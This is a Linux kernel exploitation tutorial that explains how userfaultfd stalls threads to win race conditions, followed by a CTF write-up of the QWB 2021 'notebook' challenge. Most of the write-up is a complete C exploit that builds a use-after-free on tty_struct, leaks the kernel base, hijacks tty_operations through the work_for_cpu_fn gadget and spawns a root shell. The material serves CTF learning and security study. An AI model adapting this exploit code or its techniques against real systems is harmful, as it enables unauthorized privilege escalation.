Skip to content

Using userfaultfd to Create Race Conditions

Overview

Strictly speaking, userfaultfd is not an exploitation technique, but rather a Linux system call. In simple terms, through the userfaultfd mechanism, users can handle page fault exceptions in user mode via a custom page fault handler.

The following diagram illustrates the entire userfaultfd workflow well:

userfaultfd.png

To use the userfaultfd system call, we first need to register a userfaultfd, monitor a memory region via ioctl, and also start a dedicated polling thread called uffd monitor, which continuously polls using the poll() function until a page fault exception occurs.

  • When a thread triggers a page fault exception within this memory region (e.g., accessing an anonymous page for the first time), this thread (called the faulting thread) enters the kernel to handle the page fault exception.
  • The kernel calls handle_userfault() to hand it off to userfaultfd for processing.
  • The faulting thread then enters a blocked state, and a uffd_msg is sent to the monitor thread, waiting for it to finish processing.
  • The monitor thread handles the page fault exception via ioctl, with the following options:
  • UFFDIO_COPY: Copy user-defined data to the faulting page.
  • UFFDIO_ZEROPAGE: Zero out the faulting page.
  • UFFDIO_WAKE: Used in conjunction with the UFFDIO_COPY_MODE_DONTWAKE and UFFDIO_ZEROPAGE_MODE_DONTWAKE modes from the above two options to implement batch filling.
  • After processing is complete, the monitor thread sends a signal to wake up the faulting thread to continue working.

The above is the entire workflow of the userfaultfd mechanism. This mechanism was originally designed for virtual machine/process migration and similar purposes, but through this mechanism we can control the execution order of processes, thereby greatly increasing the success rate of race condition exploitation. For example, during the following operation:

copy_from_user(kptr, user_buf, size);

If after entering the function but before the actual copy begins, the thread is interrupted and switched off the CPU, and another thread executes and modifies the ownership of the memory block pointed to by kptr (e.g., kfree-ing that memory block), then when the copy actually executes, a UAF can be achieved. This possibility is of course relatively small, but if user_buf is an mmap-ed memory block and we have registered userfaultfd for it, then when a page fault exception occurs during copying, this thread will first execute our registered handler. The thread remains suspended until the handler finishes, and only then will subsequent operations execute, greatly increasing the success rate of the race.

Usage

The Linux man page already provides us with a basic usage template for userfaultfd. We only need to make minor modifications to put it into practical use. Below is the author's personal template for registering a userfaultfd monitor for specific memory:

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
                          unsigned long len, void *(*handler)(void*))
{
    long uffd;
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    int s;

    /* Create and enable userfaultfd object */
    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1)
        err_exit("userfaultfd");

    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
        err_exit("ioctl-UFFDIO_API");

    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
        err_exit("ioctl-UFFDIO_REGISTER");

    s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
    if (s != 0)
        err_exit("pthread_create");
}

We can directly register userfaultfd for an anonymous mmap memory block through the following operation:

register_userfaultfd(thread, addr, len, handler);

Note the handler implementation. Here the author directly adapted it from the Linux man page with minor modifications. It can be customized according to individual needs:

static char *uffd_src_page = NULL; // the data you want to copy in
static long uffd_src_page_size = 0x1000;

static void *
fault_handler_thread(void *arg)
{
    static struct uffd_msg msg;
    static int fault_cnt = 0;
    long uffd;

    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = (long) arg;

    for (;;) 
    {
        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);

        /*
         * [Pause here.jpg]
         * When poll returns, it means a page fault exception has occurred.
         * You can insert operations here such as sleep(),
         * for example waiting for another process to complete object reallocation before re-copying, or just sleep forever :)
         */

        if (nready == -1)
            err_exit("poll");

        nread = read(uffd, &msg, sizeof(msg));

        if (nread == 0)
            err_exit("EOF on userfaultfd!\n");

        if (nread == -1)
            err_exit("read");

        if (msg.event != UFFD_EVENT_PAGEFAULT)
            err_exit("Unexpected event on userfaultfd\n");

        uffdio_copy.src = (unsigned long) uffd_src_page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
                                              ~(uffd_src_page_size - 1);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            err_exit("ioctl-UFFDIO_COPY");
    }
}

Example: QWB2021-notebook

Here we use the notebook challenge from QiangWangBei (QWB) 2021 as an example to explain the use of userfaultfd in race conditions.

Analysis

First, let's look at the startup script:

#!/bin/sh
stty intr ^]
qemu-system-x86_64 \
    -m 64M \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" \
    -nographic -net user -net nic -device e1000 \
    -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \
    -monitor /dev/null 2>/dev/null -s

The loglevel is set to 3 during append. It's recommended to remove this, which makes debugging easier to judge (you can see the driver's printk output).

The program flow is relatively simple and the symbols are not stripped, so we won't analyze it here. The main vulnerability in the program is UAF caused by a race condition.

First, let's discuss read-write locks. Their properties are:

  • When a write lock is acquired, all lock acquisition operations are blocked.
  • When a read lock is acquired, write lock acquisition operations are blocked.

Proper use of read-write locks can ensure thread synchronization while improving program performance. The driver in this challenge acquires a read lock in the noteedit and noteadd operations, and only acquires a write lock in the notedel operation. All other operations have no lock protection. The two read-locked operations actually perform write operations, but they can run concurrently, which makes a race condition vulnerability very likely.

This is part of the code for the noteedit operation. The krealloc here has no restrictions on newsize. At the same time, the note pointer is not updated immediately; instead, a copy_from_user operation is inserted before the update. This means we can use userfaultfd to stall the current thread and prevent the note from being updated, thus preserving a pointer to a kfree-ed slab. The problem with this approach is that the note's size is updated to 0, so subsequent read and write operations cannot read or write data.

However, in the add operation, similarly, a copy_from_user operation is inserted before updating the size. We can also stall the thread here and change the size to 0x60.

Therefore, we can achieve the following:

  • Allocate a slab of arbitrary size. Although the add operation limits the size to a maximum of 0x60, we can krealloc a slab of arbitrary size through edit.
  • UAF on a slab of arbitrary size. However, we can only control the first 0x60 bytes of data.

Exploitation

Since the edit function uses copy_from_user(), this provides an opportunity for userfaultfd intervention. We can:

  • Allocate a note of a specific size.
  • Start a new edit thread to free it via krealloc(0), and stall it here using userfaultfd.

At this point, the object in the notebook array has not been cleared and still points to the previously freed object. We just need to allocate it to another kernel structure to complete the UAF.

Here we still choose the classic tty_struct to complete the exploitation. Since the challenge provides a heap block reading functionality, we can directly leak the kernel base address through the tty_operations in tty_struct, which is typically initialized to the global variable ptm_unix98_ops or pty_unix98_ops.

The kernel with KASLR enabled still uses page granularity for memory offsets, so we can determine whether it is ptm_unix98_ops or pty_unix98_ops by comparing the lower three hexadecimal digits of the tty_operations address.

Since the challenge provides a heap block writing functionality, we can directly hijack kernel execution flow by modifying tty_struct->tty_operations and then operating on tty (e.g., read, write, ioctl... which will call the corresponding function pointers in the function table). Additionally, notegift() freely gives out the addresses of objects stored in notebook, so we can place the fake tty_operations directly into a note.

However, compared to the traditional approach of constructing a lengthy stack-pivoting ROP chain, Chaitin mentioned a very interesting trick in their writeup, original link. Quoting the original text:

After controlling rip, the next step is to bypass SMEP and SMAP. Here we introduce a trick that is very useful when you have full control of the tty object—no ROP needed at all, very simple, and very stable (our exploit can successfully escalate privileges, exit the program normally, and even shutdown without triggering a kernel panic).

There is such a function in the kernel:

img

After compilation, it roughly looks like this:

img

This function is part of the workqueue mechanism implementation. Any kernel with multi-core support enabled (CONFIG_SMP) will contain this function's code. It's easy to notice that this function is very useful: as long as you can control the memory pointed to by the first parameter, you can call any function with one arbitrary argument and store the return value back to the memory pointed to by the first parameter. Moreover, this "gadget" returns cleanly, and you don't need to worry about SMAP or SMEP during execution at all. Since the first parameter of many kernel read / write / ioctl implementations also happens to be the corresponding object itself, it is very well-suited for this scenario. Considering that all we need to do for privilege escalation is commit_creds(prepare_kernel_cred(0)), this can be achieved with just two invocations of the above function call primitive. (If you also need to disable SELinux or similar, just find an arbitrary address write-0 gadget, which is easy to find.)

Using this primitive makes arbitrary function execution relatively easy.

During exploitation, we also need to pay attention to two points:

  • Since the challenge environment has multiple CPU cores, we should use sched_setaffinity() to bind the process to a specific core to ensure the stability of kernel object allocation without needing heap spraying.
  • The tty_struct structure has also been corrupted by us, so after completing privilege escalation, we should restore its contents to the original state.

exp

The final stable privilege escalation exploit is as follows:

/**
 * Copyright (c) 2021 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <stdint.h>
#include <poll.h>

/**
 * Kernel Pwn Infrastructure
**/

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;

void save_status()
{
    asm volatile(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );

    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/**
 * Kernel structure
**/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_file;

struct tty_operations {
    struct tty_struct * (*lookup)(struct tty_driver *driver,
            struct file *filp, int idx);
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int  (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int  (*write)(struct tty_struct * tty,
              const unsigned char *buf, int count);
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int  (*write_room)(struct tty_struct *tty);
    int  (*chars_in_buffer)(struct tty_struct *tty);
    int  (*ioctl)(struct tty_struct *tty,
            unsigned int cmd, unsigned long arg);
    long (*compat_ioctl)(struct tty_struct *tty,
                 unsigned int cmd, unsigned long arg);
    void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
    void (*throttle)(struct tty_struct * tty);
    void (*unthrottle)(struct tty_struct * tty);
    void (*stop)(struct tty_struct *tty);
    void (*start)(struct tty_struct *tty);
    void (*hangup)(struct tty_struct *tty);
    int (*break_ctl)(struct tty_struct *tty, int state);
    void (*flush_buffer)(struct tty_struct *tty);
    void (*set_ldisc)(struct tty_struct *tty);
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);
    void (*send_xchar)(struct tty_struct *tty, char ch);
    int (*tiocmget)(struct tty_struct *tty);
    int (*tiocmset)(struct tty_struct *tty,
            unsigned int set, unsigned int clear);
    int (*resize)(struct tty_struct *tty, struct winsize *ws);
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
    int (*get_icount)(struct tty_struct *tty,
                struct serial_icounter_struct *icount);
    void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
    int (*poll_init)(struct tty_driver *driver, int line, char *options);
    int (*poll_get_char)(struct tty_driver *driver, int line);
    void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
    const struct file_operations *proc_fops;
};

/**
 * kernel-relaetd numerical value
**/

#define TTY_STRUCT_SIZE 0x2e0

#define PTM_UNIX98_OPS 0xffffffff81e8e440
#define PTY_UNIX98_OPS 0xffffffff81e8e320
#define COMMIT_CREDS 0xffffffff810a9b40
#define PREPARE_KERNEL_CRED 0xffffffff810a9ef0
#define WORK_FOR_CPU_FN 0xffffffff8109eb90

/**
 * Syscall userfaultfd() operator
**/
#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER        (0x00)
#define _UFFDIO_COPY            (0x03)
#define _UFFDIO_API         (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API      _IOWR(UFFDIO, _UFFDIO_API,  \
                      struct uffdio_api)
#define UFFDIO_REGISTER     _IOWR(UFFDIO, _UFFDIO_REGISTER, \
                      struct uffdio_register)
#define UFFDIO_COPY     _IOWR(UFFDIO, _UFFDIO_COPY, \
                      struct uffdio_copy)

/* read() structure */
struct uffd_msg {
    uint8_t event;

    uint8_t reserved1;
    uint16_t    reserved2;
    uint32_t    reserved3;

    union {
        struct {
            uint64_t    flags;
            uint64_t    address;
            union {
                uint32_t ptid;
            } feat;
        } pagefault;

        struct {
            uint32_t    ufd;
        } fork;

        struct {
            uint64_t    from;
            uint64_t    to;
            uint64_t    len;
        } remap;

        struct {
            uint64_t    start;
            uint64_t    end;
        } remove;

        struct {
            /* unused reserved fields */
            uint64_t    reserved1;
            uint64_t    reserved2;
            uint64_t    reserved3;
        } reserved;
    } arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT    0x12

struct uffdio_api {
    uint64_t api;
    uint64_t features;
    uint64_t ioctls;
};

struct uffdio_range {
    uint64_t start;
    uint64_t len;
};

struct uffdio_register {
    struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING    ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP     ((uint64_t)1<<1)
    uint64_t mode;
    uint64_t ioctls;
};


struct uffdio_copy {
    uint64_t dst;
    uint64_t src;
    uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE       ((uint64_t)1<<0)
    uint64_t mode;
    int64_t copy;
};

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
                          unsigned long len, void *(*handler)(void*))
{
    long uffd;
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    int s;

    /* Create and enable userfaultfd object */
    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        err_exit("userfaultfd");
    }

    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
        err_exit("ioctl-UFFDIO_API");
    }

    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
        err_exit("ioctl-UFFDIO_REGISTER");
    }

    s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
    if (s != 0) {
        err_exit("pthread_create");
    }
}

void *uffd_handler_for_stucking_thread(void *args)
{
    struct uffd_msg msg;
    int fault_cnt = 0;
    long uffd;

    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = (long) args;

    for (;;) {
        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);

        if (nready == -1) {
            err_exit("poll");
        }

        nread = read(uffd, &msg, sizeof(msg));

        /* just stuck there is okay... */
        sleep(100000000);

        if (nread == 0) {
            err_exit("EOF on userfaultfd!\n");
        }

        if (nread == -1) {
            err_exit("read");
        }

        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            err_exit("Unexpected event on userfaultfd\n");
        }

        uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
        uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
                                                    ~(0x1000 - 1);
        uffdio_copy.len = 0x1000;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            err_exit("ioctl-UFFDIO_COPY");
        }

        return NULL;
    }
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread, 
                                          void *buf, unsigned long len)
{
    register_userfaultfd(monitor_thread, buf, len, 
                         uffd_handler_for_stucking_thread);
}

/**
 * Challenge interactor
**/

#define NOTE_NUM 0x10

struct note {
    size_t idx;
    size_t size;
    char * buf;
};

struct knotebook {
    void *ptr;
    size_t size;
};

int note_fd;
sem_t evil_add_sem, evil_edit_sem;
char *uffd_buf;
char temp_page[0x1000] = { "arttnba3" };

void note_add(size_t idx, size_t size, char * buf)
{
    struct note note = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };

    ioctl(note_fd, 0x100, &note);
}

void note_del(size_t idx)
{
    struct note note = {
        .idx = idx,
    };

    ioctl(note_fd, 0x200, &note);
}

void note_edit(size_t idx, size_t size, char * buf)
{
    struct note note = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };

    ioctl(note_fd, 0x300, &note);
}

void note_gift(void *buf)
{
    struct note note = {
        .buf = buf,
    };

    ioctl(note_fd, 100, &note);
}

ssize_t note_read(int idx, void *buf)
{
    return read(note_fd, buf, idx);
}

ssize_t note_wriite(int idx, void *buf)
{
    return write(note_fd, buf, idx);
}

/**
 * Exploite stage
**/

void* fix_size_by_add(void *args)
{
    sem_wait(&evil_add_sem);
    note_add(0, 0x60, uffd_buf);
}

void* construct_uaf(void * args)
{
    sem_wait(&evil_edit_sem);
    note_edit(0, 0, uffd_buf);
}

void exploit()
{
    struct knotebook kernel_notebook[NOTE_NUM];
    struct tty_operations fake_tty_ops;
    pthread_t uffd_monitor_thread, add_fix_size_thread, edit_uaf_thread;
    size_t fake_tty_struct_data[0x100], tty_ops, orig_tty_struct_data[0x100];
    size_t tty_struct_addr, fake_tty_ops_addr;
    int tty_fd;

    /* fundamental infastructure */
    save_status();
    bind_core(0);

    sem_init(&evil_add_sem, 0, 0);
    sem_init(&evil_edit_sem, 0, 0);

    /* open dev */
    note_fd = open("/dev/notebook", O_RDWR);
    if (note_fd < 0) {
        err_exit("failed to open /dev/notebook!");
    }

    /* register userfaultfd */
    puts("[*] register userfaultfd...");

    uffd_buf = (char *) mmap(
        NULL,
        0x1000,
        PROT_READ | PROT_WRITE, 
        MAP_PRIVATE | MAP_ANONYMOUS,
        -1,
        0
    );
    register_userfaultfd_for_thread_stucking(
        &uffd_monitor_thread,
        uffd_buf,
        0x1000
    );

    /* get a tty-size object */
    puts("[*] allocating tty_struct-size object...");

    note_add(0, 0x10, "arttnba3rat3bant");
    note_edit(0, TTY_STRUCT_SIZE, temp_page);

    /**
     * construct UAF by userfaultfd.
     * Note that we need to sleep(1) there to wait for the kfree() to be done,
     * so that the UAF object can be regetted later.
    */
    puts("[*] constructing UAF on tty_struct...");

    pthread_create(&edit_uaf_thread, NULL, construct_uaf, NULL);
    pthread_create(&add_fix_size_thread, NULL, fix_size_by_add, NULL);

    sem_post(&evil_edit_sem);
    sleep(1);

    /**
     * fix notebook[0]->size.
     * Note that we need to sleep(1) there to wait for the `size` to be fixed.
    */
    sem_post(&evil_add_sem);
    sleep(1);

    /* leak kernel_base by tty_struct */
    puts("[*] leaking kernel_base by tty_struct");

    tty_fd = open("/dev/ptmx", O_RDWR| O_NOCTTY);
    note_read(0, orig_tty_struct_data);

    if (*(int*) orig_tty_struct_data != 0x5401) {
        err_exit("failed to hit the tty_struct!");
    }

    tty_ops = orig_tty_struct_data[3];
    kernel_offset = (tty_ops & 0xfff) == (PTY_UNIX98_OPS & 0xfff) 
                    ? (tty_ops - PTY_UNIX98_OPS)
                    : tty_ops - PTM_UNIX98_OPS;
    kernel_base += kernel_offset;
    printf("\033[34m\033[1m[*] Kernel offset: \033[0m0x%lx\n", kernel_offset);
    printf("\033[32m\033[1m[+] Kernel base: \033[0m0x%lx\n", kernel_base);

    /* construct fake tty_ops */
    puts("[*] construct fake tty_operations...");

    fake_tty_ops.ioctl = (void*) (kernel_offset + WORK_FOR_CPU_FN);
    note_add(1, 0x50, temp_page);
    note_edit(1, sizeof(struct tty_operations), temp_page);
    note_wriite(1, &fake_tty_ops);

    /* get kernel addr of tty_struct and tty_ops by gift */
    puts("[*] leaking kernel heap addr by gift...");

    note_gift(&kernel_notebook);
    tty_struct_addr = (size_t) kernel_notebook[0].ptr;
    fake_tty_ops_addr = (size_t) kernel_notebook[1].ptr;

    printf("[+] tty_struct at 0x%lx\n", tty_struct_addr);
    printf("[+] fake_tty_ops at 0x%lx\n", fake_tty_ops_addr);

    /* prepare_kernel_cred(NULL) */
    puts("[*] triger commit_creds(prepare_kernel_cred(NULL)) and fix tty...");

    memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0);
    fake_tty_struct_data[3] = fake_tty_ops_addr;
    fake_tty_struct_data[4] = kernel_offset + PREPARE_KERNEL_CRED;
    fake_tty_struct_data[5] = (size_t) NULL;

    note_wriite(0, fake_tty_struct_data);

    ioctl(tty_fd, 233, 233);

    /* commit_creds(&root_cred) */
    note_read(0, fake_tty_struct_data);
    fake_tty_struct_data[4] = kernel_offset + COMMIT_CREDS;
    fake_tty_struct_data[5] = fake_tty_struct_data[6];
    fake_tty_struct_data[6] = orig_tty_struct_data[6];

    note_wriite(0, fake_tty_struct_data);

    ioctl(tty_fd, 233, 233);

    /* fix tty_struct */
    memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0);
    note_wriite(0, fake_tty_struct_data);

    /* pop root shell */
    get_root_shell();
}

int main(int argc, char **argv, char **envp)
{
    exploit();
    return 0;
}

Newer Kernel Versions Countering userfaultfd in Race Condition Exploitation

As the saying goes, "there is no silver bullet." You may find that in newer kernel versions, the userfaultfd system call fails to start successfully:

uffd_failed

This is because newer kernel versions modified the value of the variable sysctl_unprivileged_userfaultfd:

From linux-5.11 source code fs/userfaultfd.c:

int sysctl_unprivileged_userfaultfd __read_mostly;
//...
SYSCALL_DEFINE1(userfaultfd, int, flags)
{
    struct userfaultfd_ctx *ctx;
    int fd;

    if (!sysctl_unprivileged_userfaultfd &&
        (flags & UFFD_USER_MODE_ONLY) == 0 &&
        !capable(CAP_SYS_PTRACE)) {
        printk_once(KERN_WARNING "uffd: Set unprivileged_userfaultfd "
            "sysctl knob to 1 if kernel faults must be handled "
            "without obtaining CAP_SYS_PTRACE capability\n");
        return -EPERM;
    }
//...

From linux-5.4 source code fs/userfaultfd.c:

int sysctl_unprivileged_userfaultfd __read_mostly = 1;
//...

In previous versions, the variable sysctl_unprivileged_userfaultfd was initialized to 1, while in newer kernel versions this variable is not given an initial value, so the compiler places it in the bss segment with a default value of 0.

This means that in newer kernel versions, only root privileges can use userfaultfd. This perhaps indicates that userfaultfd, which had just entered the public's field of vision, may gradually fade from it again. However, it is undeniable that userfaultfd has provided us with a brand new approach and an extremely stable exploitation technique for race condition exploitation in the Linux kernel.

Reference

【PWN.0x00】Linux Kernel Pwn I:Basic Exploit to Kernel Pwn in CTF

Linux kernel pwn learning - Race Condition (Part 2) userfaultfd

https://zhuanlan.zhihu.com/p/385645268

https://www.cjovi.icu/WP/1455.html

https://www.cjovi.icu/WP/1468.html

From Kernel to User Space (1) — User-mode Page Fault Handling Mechanism: Introduction to userfaultfd